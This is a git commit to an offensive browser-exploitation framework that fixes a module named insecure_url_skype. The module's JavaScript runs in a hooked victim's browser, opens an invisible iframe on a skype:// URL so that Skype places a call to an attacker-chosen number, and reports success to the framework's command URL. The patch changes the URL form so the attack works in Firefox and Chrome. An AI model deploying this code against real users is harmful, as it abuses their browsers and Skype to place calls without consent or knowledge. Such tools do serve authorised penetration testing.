From a49f46c681130133bbc8cea4a4dfdc752cbc965e Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Mon, 14 Mar 2011 10:31:57 +0000 Subject: [PATCH] issue 269: corrected the skype handler. Now works great on Firefox and Chrome. Still don't work on Safari. git-svn-id: https://beef.googlecode.com/svn/trunk@792 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- modules/commands/host/insecure_url_skype/insecure_url_skype.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/commands/host/insecure_url_skype/insecure_url_skype.js b/modules/commands/host/insecure_url_skype/insecure_url_skype.js index 53fc9bc2a..24e0143db 100644 --- a/modules/commands/host/insecure_url_skype/insecure_url_skype.js +++ b/modules/commands/host/insecure_url_skype/insecure_url_skype.js @@ -1,5 +1,5 @@ beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); - sploit.src = 'skype:<%= @tel_num %>?cal'; + sploit.src = 'skype://<%= @tel_num %>?call'; beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); });